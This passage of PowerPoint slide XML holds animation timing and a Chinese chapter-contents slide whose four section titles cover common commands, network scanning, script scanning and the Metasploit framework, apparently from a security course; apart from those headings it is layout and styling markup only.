                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>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7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="20" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="25" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="26" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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bldLvl="0" animBg="1"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="6" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="7" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="8" grpId="0"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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Text Placeholder 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1071996" y="2766621"/>
            <a:ext cx="3008380" cy="662379"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4265" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>本章内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4265" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="1565050"/>
            <a:ext cx="1192345" cy="666115"/>
            <a:chOff x="2215144" y="927951"/>
            <a:chExt cx="1244730" cy="915925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="平行四边形 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="982844"/>
              <a:ext cx="1120898" cy="842780"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="文本框 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="927951"/>
              <a:ext cx="1066799" cy="915925"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48" name="组合 47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="2471202"/>
            <a:ext cx="1192345" cy="672217"/>
            <a:chOff x="2215144" y="1952311"/>
            <a:chExt cx="1244730" cy="924318"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="平行四边形 48"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="2033848"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="文本框 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="1952311"/>
              <a:ext cx="1066799" cy="915927"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51" name="组合 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="3407000"/>
            <a:ext cx="1192345" cy="666115"/>
            <a:chOff x="2215144" y="3018134"/>
            <a:chExt cx="1244730" cy="915925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="平行四边形 51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="3084852"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="文本框 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="3018134"/>
              <a:ext cx="1066799" cy="915925"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="54" name="组合 53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596626" y="4316986"/>
            <a:ext cx="1192345" cy="677512"/>
            <a:chOff x="2215144" y="4047039"/>
            <a:chExt cx="1244730" cy="931598"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="平行四边形 54"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="4135856"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="文本框 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="4047039"/>
              <a:ext cx="1066799" cy="915927"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="组合 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="1582798"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="953426"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="矩形 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4615667" y="1005461"/>
              <a:ext cx="3228975" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.1 常用命令</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="平行四边形 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="953426"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="158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91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="63" name="组合 62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="2508336"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="1647579"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="矩形 63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4644505" y="1715136"/>
              <a:ext cx="2827147" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.2 网络扫描</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="65" name="平行四边形 64"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="1647579"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="66" name="组合 65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="3433872"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="2341731"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="矩形 66"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4644506" y="2450133"/>
              <a:ext cx="2827146" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>.3 脚本扫描</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="平行四边形 67"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="2341731"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="69" name="组合 68"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5502297" y="4359409"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="3035884"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70" name="矩形 69"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4623073" y="3097846"/>
              <a:ext cx="2827147" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.4 Metasploit框架</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="71" name="平行四边形 70"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="3035884"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
